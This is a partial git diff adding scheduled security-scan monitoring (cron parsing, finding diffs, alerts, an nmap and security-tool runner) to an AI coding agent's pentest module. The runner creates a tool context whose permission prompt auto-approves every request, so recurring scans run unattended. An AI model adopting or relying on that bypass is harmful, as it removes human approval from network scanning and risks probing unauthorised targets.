+      log.error("Webhook delivery failed", {
+        url,
+        error: error instanceof Error ? error.message : String(error),
+      })
+    }
+  }
+
+  /**
+   * Clear cooldown for a monitor (useful for testing).
+   *
+   * @param monitorID - Monitor ID
+   */
+  export function clearCooldown(monitorID: string): void {
+    lastAlertTime.delete(monitorID)
+  }
+
+  /**
+   * Clear all cooldowns.
+   */
+  export function clearAllCooldowns(): void {
+    lastAlertTime.clear()
+  }
+}
diff --git a/packages/opencode/src/pentest/monitoring/cron-parser.ts b/packages/opencode/src/pentest/monitoring/cron-parser.ts
new file mode 100644
index 00000000000..a4ecf9aeba9
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/cron-parser.ts
@@ -0,0 +1,249 @@
+/**
+ * @fileoverview Cron Parser
+ *
+ * Lightweight cron expression parser without external dependencies.
+ * Supports standard 5-field cron: minute hour dayOfMonth month dayOfWeek
+ *
+ * @module pentest/monitoring/cron-parser
+ */
+
+/**
+ * Parsed cron fields.
+ */
+interface CronParts {
+  minute: number[]
+  hour: number[]
+  dayOfMonth: number[]
+  month: number[]
+  dayOfWeek: number[]
+}
+
+/**
+ * Cron expression parser namespace.
+ */
+export namespace CronParser {
+  /**
+   * Parse a cron expression into parts.
+   *
+   * @param expression - Cron expression (5 fields)
+   * @returns Parsed cron parts with valid values for each field
+   *
+   * @example
+   * ```typescript
+   * const parts = CronParser.parse("0 * * * *") // Every hour
+   * const parts = CronParser.parse("0 0 * * *") // Daily at midnight
+   * const parts = CronParser.parse("0/15 * * * *") // Every 15 minutes
+   * ```
+   */
+  export function parse(expression: string): CronParts {
+    const parts = expression.trim().split(/\s+/)
+    if (parts.length !== 5) {
+      throw new Error(`Invalid cron expression: expected 5 fields, got ${parts.length}`)
+    }
+
+    return {
+      minute: parseField(parts[0], 0, 59),
+      hour: parseField(parts[1], 0, 23),
+      dayOfMonth: parseField(parts[2], 1, 31),
+      month: parseField(parts[3], 1, 12),
+      dayOfWeek: parseField(parts[4], 0, 6),
+    }
+  }
+
+  /**
+   * Parse a single cron field.
+   */
+  function parseField(field: string, min: number, max: number): number[] {
+    const result: Set<number> = new Set()
+
+    for (const part of field.split(",")) {
+      if (part === "*") {
+        // Wildcard: all values
+        for (let i = min; i <= max; i++) result.add(i)
+      } else if (part.includes("/")) {
+        // Step values: */5 or 1-10/2
+        const [range, stepStr] = part.split("/")
+        const step = parseInt(stepStr, 10)
+        if (isNaN(step) || step <= 0) {
+          throw new Error(`Invalid step value: ${stepStr}`)
+        }
+        const [start, end] = range === "*" ? [min, max] : parseRange(range, min, max)
+        for (let i = start; i <= end; i += step) result.add(i)
+      } else if (part.includes("-")) {
+        // Range: 1-5
+        const [start, end] = parseRange(part, min, max)
+        for (let i = start; i <= end; i++) result.add(i)
+      } else {
+        // Single value
+        const val = parseInt(part, 10)
+        if (isNaN(val)) {
+          throw new Error(`Invalid value: ${part}`)
+        }
+        if (val >= min && val <= max) result.add(val)
+      }
+    }
+
+    return Array.from(result).sort((a, b) => a - b)
+  }
+
+  /**
+   * Parse a range expression (e.g., "1-5").
+   */
+  function parseRange(range: string, min: number, max: number): [number, number] {
+    const [startStr, endStr] = range.split("-")
+    const start = Math.max(min, parseInt(startStr, 10))
+    const end = Math.min(max, parseInt(endStr, 10))
+    if (isNaN(start) || isNaN(end)) {
+      throw new Error(`Invalid range: ${range}`)
+    }
+    return [start, end]
+  }
+
+  /**
+   * Calculate the next run time after a given timestamp.
+   *
+   * @param expression - Cron expression
+   * @param after - Timestamp to start from (milliseconds)
+   * @param _timezone - Timezone (currently ignored, uses local time)
+   * @returns Next run timestamp in milliseconds
+   *
+   * @example
+   * ```typescript
+   * const next = CronParser.nextRun("0 0 * * *", Date.now())
+   * console.log(new Date(next)) // Next midnight
+   * ```
+   */
+  export function nextRun(expression: string, after: number, _timezone?: string): number {
+    const parts = parse(expression)
+    const date = new Date(after)
+
+    // Start from the next minute
+    date.setSeconds(0, 0)
+    date.setMinutes(date.getMinutes() + 1)
+
+    // Limit search to prevent infinite loops (1 year of minutes)
+    const maxIterations = 366 * 24 * 60
+    let iterations = 0
+
+    while (iterations < maxIterations) {
+      iterations++
+
+      const month = date.getMonth() + 1
+      const dayOfMonth = date.getDate()
+      const dayOfWeek = date.getDay()
+      const hour = date.getHours()
+      const minute = date.getMinutes()
+
+      // Check month
+      if (!parts.month.includes(month)) {
+        date.setMonth(date.getMonth() + 1, 1)
+        date.setHours(0, 0, 0, 0)
+        continue
+      }
+
+      // Check day of month OR day of week (both must be considered)
+      const dayOfMonthMatch = parts.dayOfMonth.includes(dayOfMonth)
+      const dayOfWeekMatch = parts.dayOfWeek.includes(dayOfWeek)
+
+      // If both dayOfMonth and dayOfWeek are restricted (not *), use OR logic
+      // If one is *, use the other
+      const dayOfMonthIsWildcard = parts.dayOfMonth.length === 31
+      const dayOfWeekIsWildcard = parts.dayOfWeek.length === 7
+
+      let dayMatch: boolean
+      if (dayOfMonthIsWildcard && dayOfWeekIsWildcard) {
+        dayMatch = true
+      } else if (dayOfMonthIsWildcard) {
+        dayMatch = dayOfWeekMatch
+      } else if (dayOfWeekIsWildcard) {
+        dayMatch = dayOfMonthMatch
+      } else {
+        // Both are restricted: OR logic per cron spec
+        dayMatch = dayOfMonthMatch || dayOfWeekMatch
+      }
+
+      if (!dayMatch) {
+        date.setDate(date.getDate() + 1)
+        date.setHours(0, 0, 0, 0)
+        continue
+      }
+
+      // Check hour
+      if (!parts.hour.includes(hour)) {
+        date.setHours(date.getHours() + 1, 0, 0, 0)
+        continue
+      }
+
+      // Check minute
+      if (!parts.minute.includes(minute)) {
+        date.setMinutes(date.getMinutes() + 1, 0, 0)
+        continue
+      }
+
+      // Found a match
+      return date.getTime()
+    }
+
+    throw new Error("Could not find next run time within 1 year")
+  }
+
+  /**
+   * Validate a cron expression.
+   *
+   * @param expression - Cron expression to validate
+   * @returns Validation result with error message if invalid
+   */
+  export function validate(expression: string): { valid: boolean; error?: string } {
+    try {
+      parse(expression)
+      return { valid: true }
+    } catch (error) {
+      return {
+        valid: false,
+        error: error instanceof Error ? error.message : String(error),
+      }
+    }
+  }
+
+  /**
+   * Get a human-readable description of a cron expression.
+   *
+   * @param expression - Cron expression
+   * @returns Human-readable description
+   */
+  export function describe(expression: string): string {
+    const parts = expression.trim().split(/\s+/)
+    if (parts.length !== 5) return "Invalid expression"
+
+    const [minute, hour, dayOfMonth, month, dayOfWeek] = parts
+
+    // Common patterns
+    if (minute === "*" && hour === "*" && dayOfMonth === "*" && month === "*" && dayOfWeek === "*") {
+      return "Every minute"
+    }
+    if (minute === "0" && hour === "*" && dayOfMonth === "*" && month === "*" && dayOfWeek === "*") {
+      return "Every hour"
+    }
+    if (minute === "0" && hour === "0" && dayOfMonth === "*" && month === "*" && dayOfWeek === "*") {
+      return "Daily at midnight"
+    }
+    if (minute === "0" && hour === "0" && dayOfMonth === "*" && month === "*" && dayOfWeek === "0") {
+      return "Weekly on Sunday at midnight"
+    }
+    if (minute === "0" && hour === "0" && dayOfMonth === "1" && month === "*" && dayOfWeek === "*") {
+      return "Monthly on the 1st at midnight"
+    }
+
+    // Step patterns
+    if (minute.startsWith("*/")) {
+      const step = minute.slice(2)
+      return `Every ${step} minutes`
+    }
+    if (hour.startsWith("*/")) {
+      const step = hour.slice(2)
+      return `Every ${step} hours`
+    }
+
+    return `At minute ${minute} of hour ${hour}`
+  }
+}
diff --git a/packages/opencode/src/pentest/monitoring/diff.ts b/packages/opencode/src/pentest/monitoring/diff.ts
new file mode 100644
index 00000000000..5d93172c215
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/diff.ts
@@ -0,0 +1,165 @@
+/**
+ * @fileoverview Diff Engine
+ *
+ * Finding fingerprinting and comparison for detecting changes between runs.
+ *
+ * @module pentest/monitoring/diff
+ */
+
+import { createHash } from "crypto"
+import { PentestTypes } from "../types"
+import type { FindingFingerprint, DiffResult } from "./types"
+
+/**
+ * Diff engine namespace for comparing findings between runs.
+ */
+export namespace DiffEngine {
+  /**
+   * Create a fingerprint for a finding.
+   * The fingerprint is used to identify equivalent findings across runs.
+   *
+   * @param finding - Finding to fingerprint
+   * @returns Fingerprint with hash and key attributes
+   */
+  export function fingerprint(finding: PentestTypes.Finding): FindingFingerprint {
+    const attributes = {
+      title: normalizeTitle(finding.title),
+      target: normalizeTarget(finding.target),
+      port: finding.port,
+      service: finding.service,
+      severity: finding.severity,
+    }
+
+    // Create a stable hash of the key attributes
+    const hash = createHash("sha256")
+      .update(JSON.stringify(attributes))
+      .digest("hex")
+      .slice(0, 16)
+
+    return {
+      hash,
+      findingID: finding.id,
+      attributes,
+    }
+  }
+
+  /**
+   * Normalize title for comparison (remove dynamic content).
+   */
+  function normalizeTitle(title: string): string {
+    return title
+      // Remove timestamps
+      .replace(/\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}/g, "")
+      // Remove UUIDs
+      .replace(/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/gi, "")
+      // Normalize IP:port patterns
+      .replace(/\d+\.\d+\.\d+\.\d+:\d+/g, "IP:PORT")
+      .trim()
+      .toLowerCase()
+  }
+
+  /**
+   * Normalize target for comparison.
+   */
+  function normalizeTarget(target: string): string {
+    return target.toLowerCase().replace(/\/+$/, "")
+  }
+
+  /**
+   * Compare findings between two runs.
+   *
+   * @param previousFindings - Findings from previous run
+   * @param currentFindings - Findings from current run
+   * @returns Diff result with new, resolved, and unchanged findings
+   */
+  export function compare(
+    previousFindings: PentestTypes.Finding[],
+    currentFindings: PentestTypes.Finding[]
+  ): DiffResult {
+    const previousMap = new Map<string, FindingFingerprint>()
+    const currentMap = new Map<string, FindingFingerprint>()
+
+    // Build fingerprint maps
+    for (const finding of previousFindings) {
+      const fp = fingerprint(finding)
+      previousMap.set(fp.hash, fp)
+    }
+
+    for (const finding of currentFindings) {
+      const fp = fingerprint(finding)
+      currentMap.set(fp.hash, fp)
+    }
+
+    // Find new findings (in current but not in previous)
+    const newFindings: string[] = []
+    for (const [hash, fp] of currentMap) {
+      if (!previousMap.has(hash)) {
+        newFindings.push(fp.findingID)
+      }
+    }
+
+    // Find resolved findings (in previous but not in current)
+    const resolvedFindings: string[] = []
+    for (const [hash, fp] of previousMap) {
+      if (!currentMap.has(hash)) {
+        resolvedFindings.push(fp.findingID)
+      }
+    }
+
+    // Find unchanged findings
+    const unchangedFindings: string[] = []
+    for (const [hash, fp] of currentMap) {
+      if (previousMap.has(hash)) {
+        unchangedFindings.push(fp.findingID)
+      }
+    }
+
+    return {
+      newFindings,
+      resolvedFindings,
+      unchangedFindings,
+      totalPrevious: previousFindings.length,
+      totalCurrent: currentFindings.length,
+    }
+  }
+
+  /**
+   * Calculate severity summary from findings.
+   *
+   * @param findings - Array of findings
+   * @returns Summary with counts per severity level
+   */
+  export function summarizeSeverity(findings: PentestTypes.Finding[]): {
+    critical: number
+    high: number
+    medium: number
+    low: number
+    info: number
+    total: number
+  } {
+    return {
+      critical: findings.filter((f) => f.severity === "critical").length,
+      high: findings.filter((f) => f.severity === "high").length,
+      medium: findings.filter((f) => f.severity === "medium").length,
+      low: findings.filter((f) => f.severity === "low").length,
+      info: findings.filter((f) => f.severity === "info").length,
+      total: findings.length,
+    }
+  }
+
+  /**
+   * Filter findings by minimum severity.
+   *
+   * @param findings - Findings to filter
+   * @param minSeverity - Minimum severity to include
+   * @returns Filtered findings
+   */
+  export function filterBySeverity(
+    findings: PentestTypes.Finding[],
+    minSeverity: PentestTypes.Severity
+  ): PentestTypes.Finding[] {
+    const severityOrder: PentestTypes.Severity[] = ["info", "low", "medium", "high", "critical"]
+    const minIndex = severityOrder.indexOf(minSeverity)
+    return findings.filter((f) => severityOrder.indexOf(f.severity) >= minIndex)
+  }
+}
diff --git a/packages/opencode/src/pentest/monitoring/events.ts b/packages/opencode/src/pentest/monitoring/events.ts
new file mode 100644
index 00000000000..2df532375e5
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/events.ts
@@ -0,0 +1,175 @@
+/**
+ * @fileoverview Monitoring Events
+ *
+ * Bus event definitions for continuous monitoring.
+ *
+ * @module pentest/monitoring/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+import { PentestTypes } from "../types"
+
+/**
+ * Monitoring events namespace.
+ */
+export namespace MonitoringEvents {
+  /**
+   * Monitor was scheduled for execution.
+   */
+  export const MonitorScheduled = BusEvent.define(
+    "pentest.monitor.scheduled",
+    z.object({
+      monitorID: z.string(),
+      nextRunAt: z.number(),
+    })
+  )
+
+  /**
+   * Monitor run started.
+   */
+  export const MonitorRunStarted = BusEvent.define(
+    "pentest.monitor.run_started",
+    z.object({
+      monitorID: z.string(),
+      runID: z.string(),
+      runNumber: z.number(),
+      targets: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Monitor run completed successfully.
+   */
+  export const MonitorRunCompleted = BusEvent.define(
+    "pentest.monitor.run_completed",
+    z.object({
+      monitorID: z.string(),
+      runID: z.string(),
+      runNumber: z.number(),
+      duration: z.number(),
+      findingsCount: z.number(),
+      newFindingsCount: z.number(),
+      resolvedFindingsCount: z.number(),
+    })
+  )
+
+  /**
+   * Monitor run failed.
+   */
+  export const MonitorRunFailed = BusEvent.define(
+    "pentest.monitor.run_failed",
+    z.object({
+      monitorID: z.string(),
+      runID: z.string(),
+      error: z.string(),
+    })
+  )
+
+  /**
+   * Monitor was paused.
+   */
+  export const MonitorPaused = BusEvent.define(
+    "pentest.monitor.paused",
+    z.object({
+      monitorID: z.string(),
+    })
+  )
+
+  /**
+   * Monitor was resumed.
+   */
+  export const MonitorResumed = BusEvent.define(
+    "pentest.monitor.resumed",
+    z.object({
+      monitorID: z.string(),
+    })
+  )
+
+  /**
+   * Monitor was cancelled/disabled.
+   */
+  export const MonitorCancelled = BusEvent.define(
+    "pentest.monitor.cancelled",
+    z.object({
+      monitorID: z.string(),
+    })
+  )
+
+  /**
+   * New vulnerabilities detected alert.
+   * This is the primary alert event for notifications.
+   */
+  export const NewVulnerabilitiesDetected = BusEvent.define(
+    "pentest.monitor.alert.new_vulnerabilities",
+    z.object({
+      monitorID: z.string(),
+      monitorName: z.string(),
+      runID: z.string(),
+      findings: z.array(
+        z.object({
+          id: z.string(),
+          title: z.string(),
+          severity: PentestTypes.Severity,
+          target: z.string(),
+          port: z.number().optional(),
+        })
+      ),
+      summary: z.object({
+        critical: z.number(),
+        high: z.number(),
+        medium: z.number(),
+        low: z.number(),
+        info: z.number(),
+        total: z.number(),
+      }),
+    })
+  )
+
+  /**
+   * Vulnerabilities resolved alert.
+   */
+  export const VulnerabilitiesResolved = BusEvent.define(
+    "pentest.monitor.alert.resolved",
+    z.object({
+      monitorID: z.string(),
+      monitorName: z.string(),
+      runID: z.string(),
+      resolvedCount: z.number(),
+      resolvedIDs: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Monitor created.
+   */
+  export const MonitorCreated = BusEvent.define(
+    "pentest.monitor.created",
+    z.object({
+      monitorID: z.string(),
+      name: z.string(),
+      targets: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Monitor updated.
+   */
+  export const MonitorUpdated = BusEvent.define(
+    "pentest.monitor.updated",
+    z.object({
+      monitorID: z.string(),
+      changes: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Monitor deleted.
+   */
+  export const MonitorDeleted = BusEvent.define(
+    "pentest.monitor.deleted",
+    z.object({
+      monitorID: z.string(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/monitoring/index.ts b/packages/opencode/src/pentest/monitoring/index.ts
new file mode 100644
index 00000000000..091a161e0cf
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/index.ts
@@ -0,0 +1,44 @@
+/**
+ * @fileoverview Continuous Monitoring Module
+ *
+ * Provides scheduled security scanning with diff detection and alerting.
+ *
+ * Features:
+ * - Scheduled scans (interval-based or cron)
+ * - Diff detection between scan runs
+ * - Alerts for new vulnerabilities
+ * - Integration with existing pentest tools
+ *
+ * @module pentest/monitoring
+ */
+
+// Types
+export * from "./types"
+
+// Events
+export { MonitoringEvents } from "./events"
+
+// Core functionality
+export { Scheduler } from "./scheduler"
+export { MonitorRunner } from "./runner"
+export { DiffEngine } from "./diff"
+export { Alerter } from "./alerter"
+export { CronParser } from "./cron-parser"
+
+// Storage
+export {
+  MonitorStorage,
+  createMonitor,
+  getMonitor,
+  updateMonitor,
+  deleteMonitor,
+  listMonitors,
+  saveRun,
+  getRun,
+  listRuns,
+  getLastCompletedRun,
+  generateRunId,
+} from "./storage"
+
+// Tool
+export { MonitorTool } from "./tool"
diff --git a/packages/opencode/src/pentest/monitoring/runner.ts b/packages/opencode/src/pentest/monitoring/runner.ts
new file mode 100644
index 00000000000..eeb3bffa208
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/runner.ts
@@ -0,0 +1,300 @@
+/**
+ * @fileoverview Monitor Runner
+ *
+ * Executes monitor scans and handles diff detection.
+ *
+ * @module pentest/monitoring/runner
+ */
+
+import { Log } from "../../util/log"
+import { Bus } from "../../bus"
+import { Findings } from "../findings"
+import { PentestTypes } from "../types"
+import type { Monitor, MonitorRun, MonitorToolConfig } from "./types"
+import { MonitoringEvents } from "./events"
+import { DiffEngine } from "./diff"
+import { Alerter } from "./alerter"
+import { MonitorStorage, generateRunId } from "./storage"
+import type { Tool } from "../../tool/tool"
+
+const log = Log.create({ service: "pentest.monitoring.runner" })
+
+/**
+ * Monitor runner namespace.
+ */
+export namespace MonitorRunner {
+  /**
+   * Execute a monitor run.
+   *
+   * @param monitor - Monitor to execute
+   * @returns Completed run record
+   */
+  export async function execute(monitor: Monitor): Promise<MonitorRun> {
+    const runID = generateRunId()
+    const runNumber = monitor.runCount + 1
+    const startTime = Date.now()
+
+    log.info("Starting monitor run", {
+      monitorID: monitor.id,
+      runID,
+      runNumber,
+      targets: monitor.targets,
+    })
+
+    // Create run record
+    const run: MonitorRun = {
+      id: runID,
+      monitorID: monitor.id,
+      sessionID: monitor.sessionID,
+      startTime,
+      status: "running",
+      scanIDs: [],
+      findingIDs: [],
+      newFindingIDs: [],
+      resolvedFindingIDs: [],
+      runNumber,
+    }
+
+    await MonitorStorage.saveRun(run)
+
+    // Publish run started event
+    Bus.publish(MonitoringEvents.MonitorRunStarted, {
+      monitorID: monitor.id,
+      runID,
+      runNumber,
+      targets: monitor.targets,
+    })
+
+    try {
+      // Get previous findings for diff
+      const previousFindings = await getPreviousFindings(monitor.id)
+
+      // Run each tool against each target
+      for (const target of monitor.targets) {
+        for (const toolConfig of monitor.tools) {
+          try {
+            const scanResult = await executeToolScan(monitor, run, target, toolConfig)
+            if (scanResult.scanID) {
+              run.scanIDs.push(scanResult.scanID)
+            }
+            run.findingIDs.push(...scanResult.findingIDs)
+          } catch (error) {
+            log.error("Tool scan failed", {
+              monitorID: monitor.id,
+              runID: run.id,
+              tool: toolConfig.tool,
+              target,
+              error: error instanceof Error ? error.message : String(error),
+            })
+            // Continue with other scans
+          }
+        }
+      }
+
+      // Load actual findings for diff comparison
+      const currentFindings: PentestTypes.Finding[] = []
+      for (const findingID of run.findingIDs) {
+        try {
+          const finding = await Findings.get(findingID, { storage: "file" })
+          if (finding) {
+            currentFindings.push(finding)
+          }
+        } catch {
+          // Finding may have been deleted
+        }
+      }
+
+      // Perform diff
+      const diff = DiffEngine.compare(previousFindings, currentFindings)
+      run.newFindingIDs = diff.newFindings
+      run.resolvedFindingIDs = diff.resolvedFindings
+
+      // Complete the run
+      run.endTime = Date.now()
+      run.status = "completed"
+      await MonitorStorage.saveRun(run)
+
+      // Update monitor
+      await MonitorStorage.updateMonitor(monitor.id, {
+        lastRunAt: startTime,
+        runCount: runNumber,
+        status: "active",
+        lastError: undefined,
+      })
+
+      const duration = run.endTime - startTime
+
+      // Publish completion event
+      Bus.publish(MonitoringEvents.MonitorRunCompleted, {
+        monitorID: monitor.id,
+        runID,
+        runNumber,
+        duration,
+        findingsCount: run.findingIDs.length,
+        newFindingsCount: run.newFindingIDs.length,
+        resolvedFindingsCount: run.resolvedFindingIDs.length,
+      })
+
+      // Send alerts if configured
+      if (monitor.alerts.enabled && run.newFindingIDs.length > 0) {
+        const newFindings = currentFindings.filter((f) => run.newFindingIDs.includes(f.id))
+        await Alerter.sendNewFindingsAlert(monitor, run, newFindings)
+      }
+
+      if (monitor.alerts.enabled && run.resolvedFindingIDs.length > 0) {
+        await Alerter.sendResolvedAlert(monitor, run)
+      }
+
+      log.info("Monitor run completed", {
+        monitorID: monitor.id,
+        runID,
+        duration,
+        findings: run.findingIDs.length,
+        newFindings: run.newFindingIDs.length,
+        resolved: run.resolvedFindingIDs.length,
+      })
+
+      return run
+    } catch (error) {
+      run.endTime = Date.now()
+      run.status = "failed"
+      run.error = error instanceof Error ? error.message : String(error)
+      await MonitorStorage.saveRun(run)
+
+      Bus.publish(MonitoringEvents.MonitorRunFailed, {
+        monitorID: monitor.id,
+        runID,
+        error: run.error,
+      })
+
+      log.error("Monitor run failed", {
+        monitorID: monitor.id,
+        runID,
+        error: run.error,
+      })
+
+      throw error
+    }
+  }
+
+  /**
+   * Get findings from previous completed runs for diff comparison.
+   */
+  async function getPreviousFindings(monitorID: string): Promise<PentestTypes.Finding[]> {
+    const lastRun = await MonitorStorage.getLastCompletedRun(monitorID)
+    if (!lastRun) {
+      return []
+    }
+
+    const findings: PentestTypes.Finding[] = []
+    for (const findingID of lastRun.findingIDs) {
+      try {
+        const finding = await Findings.get(findingID, { storage: "file" })
+        if (finding) {
+          findings.push(finding)
+        }
+      } catch {
+        // Finding may have been deleted
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Execute a single tool scan.
+   */
+  async function executeToolScan(
+    monitor: Monitor,
+    run: MonitorRun,
+    target: string,
+    toolConfig: MonitorToolConfig
+  ): Promise<{ scanID?: string; findingIDs: string[] }> {
+    log.info("Executing tool scan", {
+      monitorID: monitor.id,
+      runID: run.id,
+      tool: toolConfig.tool,
+      target,
+    })
+
+    // Create a minimal tool context for monitor execution
+    const ctx = createToolContext(monitor.sessionID, run.id)
+
+    // Import tools dynamically to avoid circular dependencies
+    const { NmapTool } = await import("../nmap-tool")
+    const { SecToolsTool } = await import("../sectools")
+
+    let scanID: string | undefined
+    const findingIDs: string[] = []
+
+    if (toolConfig.tool === "nmap") {
+      // Use NmapTool
+      const nmapTool = await NmapTool.init()
+      const result = await nmapTool.execute(
+        {
+          target,
+          serviceDetection: true,
+          timing: 3,
+          udpScan: false,
+          osDetection: false,
+          scriptScan: false,
+          analyzeFindings: toolConfig.createFindings,
+          timeout: toolConfig.timeout,
+        },
+        ctx
+      )
+
+      scanID = result.metadata.scanID as string | undefined
+
+      // Get findings created during this scan
+      if (scanID && toolConfig.createFindings) {
+        const scanFindings = await Findings.list({ storage: "file" }, { scanID })
+        findingIDs.push(...scanFindings.map((f) => f.id))
+      }
+    } else {
+      // Use SecToolsTool for other tools
+      const secTool = await SecToolsTool.init()
+      const result = await secTool.execute(
+        {
+          tool: toolConfig.tool,
+          target,
+          args: toolConfig.args,
+          timeout: toolConfig.timeout,
+          createFindings: toolConfig.createFindings,
+        },
+        ctx
+      )
+
+      scanID = result.metadata.scanID as string | undefined
+
+      // Get findings created during this scan
+      if (scanID && toolConfig.createFindings) {
+        const scanFindings = await Findings.list({ storage: "file" }, { scanID })
+        findingIDs.push(...scanFindings.map((f) => f.id))
+      }
+    }
+
+    return { scanID, findingIDs }
+  }
+
+  /**
+   * Create a minimal tool context for monitor execution.
+   * This context auto-approves all permission requests.
+   */
+  function createToolContext(sessionID: string, runID: string): Tool.Context {
+    return {
+      sessionID,
+      messageID: `monitor_${runID}`,
+      agent: "monitor",
+      abort: new AbortController().signal,
+      metadata: () => {
+        // No-op for monitor runs
+      },
+      ask: async () => {
+        // Auto-approve all permission requests for monitors
+        // In production, monitors should only run on pre-approved targets
+        // configured in the monitor's scope
+      },
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/monitoring/scheduler.ts b/packages/opencode/src/pentest/monitoring/scheduler.ts
new file mode 100644
index 00000000000..5dbc92b8111
--- /dev/null
+++ b/packages/opencode/src/pentest/monitoring/scheduler.ts
@@ -0,0 +1,325 @@
+/**
+ * @fileoverview Monitor Scheduler
+ *
+ * Manages scheduled execution of monitors.
+ *
+ * @module pentest/monitoring/scheduler
+ */
+
+import { Log } from "../../util/log"
+import { Instance } from "../../project/instance"
+import { Bus } from "../../bus"
+import type { Monitor, MonitorRun, Schedule } from "./types"
+import { MonitoringEvents } from "./events"
+import { MonitorRunner } from "./runner"
+import { MonitorStorage } from "./storage"
+import { CronParser } from "./cron-parser"
+
+const log = Log.create({ service: "pentest.monitoring.scheduler" })
+
+/**
+ * Scheduled task handle.
+ */
+interface ScheduledTask {
+  monitorID: string
+  timer: ReturnType<typeof setTimeout> | null
+  nextRun: number
+  cancel: () => void
+}
+
+/**
+ * Scheduler state.
+ */
+interface SchedulerState {
+  tasks: Map<string, ScheduledTask>
+  running: Set<string>
+  disposed: boolean
+}
+
+/**
+ * Monitor scheduler namespace.
+ */
+export namespace Scheduler {
+  /**
+   * Instance-scoped scheduler state.
+   */
+  const state = Instance.state<SchedulerState>(
+    () => ({
+      tasks: new Map(),
+      running: new Set(),
+      disposed: false,
+    }),
+    async (entry) => {
+      // Cleanup on instance disposal
+      entry.disposed = true
+      for (const task of entry.tasks.values()) {
+        task.cancel()
+      }
+      entry.tasks.clear()
+      entry.running.clear()
+    }
+  )
+
+  /**
+   * Initialize scheduler and load active monitors.
+   */
+  export async function initialize(): Promise<void> {
+    log.info("Initializing monitor scheduler")
+
+    const monitors = await MonitorStorage.listMonitors({ status: "active" })
+
+    for (const monitor of monitors) {
+      await scheduleMonitor(monitor)
+    }
+
+    log.info("Scheduler initialized", {
+      activeMonitors: monitors.length,
+    })
+  }
+
+  /**
+   * Schedule a monitor for execution.
+   *
+   * @param monitor - Monitor to schedule
+   */
+  export async function scheduleMonitor(monitor: Monitor): Promise<void> {
+    const s = await state()
+
+    // Cancel existing schedule if any
+    const existing = s.tasks.get(monitor.id)
+    if (existing) {
+      existing.cancel()
+    }
+
+    const nextRun = calculateNextRun(monitor.schedule, monitor.lastRunAt)
+    const delay = Math.max(0, nextRun - Date.now())
+
+    log.info("Scheduling monitor", {
+      monitorID: monitor.id,
+      name: monitor.name,
+      nextRun: new Date(nextRun).toISOString(),
+      delayMs: delay,
+    })
+
+    const task: ScheduledTask = {
+      monitorID: monitor.id,
+      nextRun,
+      timer: null,
+      cancel: () => {
+        if (task.timer) {
+          clearTimeout(task.timer)
+          task.timer = null
+        }
+      },
+    }
+
+    // Schedule the task
+    task.timer = setTimeout(async () => {
+      const currentState = await state()
+      if (currentState.disposed) return
+      await executeAndReschedule(monitor.id)
+    }, delay)
+
+    // Prevent timer from keeping process alive
+    if (task.timer.unref) {
+      task.timer.unref()
+    }
+
+    s.tasks.set(monitor.id, task)
+
+    // Update monitor with next run time
+    await MonitorStorage.updateMonitor(monitor.id, { nextRunAt: nextRun })
+
+    // Publish event
+    Bus.publish(MonitoringEvents.MonitorScheduled, {
+      monitorID: monitor.id,
+      nextRunAt: nextRun,
+    })
+  }
+
+  /**
+   * Execute a monitor and reschedule.
+   */
+  async function executeAndReschedule(monitorID: string): Promise<void> {
+    const s = await state()
+
+    // Prevent concurrent runs of the same monitor
+    if (s.running.has(monitorID)) {
+      log.warn("Monitor already running, skipping", { monitorID })
+      return
+    }
+
+    s.running.add(monitorID)
+
+    try {
+      const monitor = await MonitorStorage.getMonitor(monitorID)
+      if (!monitor || monitor.status !== "active") {
+        log.info("Monitor not active, not running", { monitorID })
+        return
+      }
+
+      // Check max runs for interval schedules
+      if (monitor.schedule.type === "interval" && monitor.schedule.maxRuns > 0) {
+        if (monitor.runCount >= monitor.schedule.maxRuns) {
+          log.info("Monitor reached max runs, disabling", { monitorID })
+          await MonitorStorage.updateMonitor(monitorID, { status: "disabled" })
+          return
+        }
+      }
+
+      // Execute the monitor
+      await MonitorRunner.execute(monitor)
+
+      // Reschedule for next run
+      const updatedMonitor = await MonitorStorage.getMonitor(monitorID)
+      if (updatedMonitor && updatedMonitor.status === "active") {
+        await scheduleMonitor(updatedMonitor)
+      }
+    } catch (error) {
+      log.error("Monitor execution failed", {
+        monitorID,
+        error: error instanceof Error ? error.message : String(error),
+      })
+      await MonitorStorage.updateMonitor(monitorID, {
+        status: "error",
+        lastError: error instanceof Error ? error.message : String(error),
+      })
+    } finally {
+      s.running.delete(monitorID)
+    }
+  }
+
+  /**
+   * Calculate next run time based on schedule.
+   */
+  function calculateNextRun(schedule: Schedule, lastRun?: number): number {
+    const now = Date.now()
+
+    if (schedule.type === "interval") {
+      if (lastRun) {
+        // Next run is lastRun + interval
+        const next = lastRun + schedule.intervalMs
+        // If we're past the next run time, run now
+        return next <= now ? now : next
+      }
+      // First run: run immediately
+      return now
+    }
+
+    if (schedule.type === "cron") {
+      return CronParser.nextRun(schedule.expression, now, schedule.timezone)
+    }
+
+    return now
+  }
+
+  /**
+   * Pause a monitor.
+   *
+   * @param monitorID - Monitor ID
+   */
+  export async function pauseMonitor(monitorID: string): Promise<void> {
+    const s = await state()
+    const task = s.tasks.get(monitorID)
+    if (task) {
+      task.cancel()
+      s.tasks.delete(monitorID)
+    }
+
+    await MonitorStorage.updateMonitor(monitorID, { status: "paused" })
+
+    Bus.publish(MonitoringEvents.MonitorPaused, { monitorID })
+  }
+
+  /**
+   * Resume a paused monitor.
+   *
+   * @param monitorID - Monitor ID
+   */
+  export async function resumeMonitor(monitorID: string): Promise<void> {
+    const monitor = await MonitorStorage.getMonitor(monitorID)
+    if (!monitor) return
+
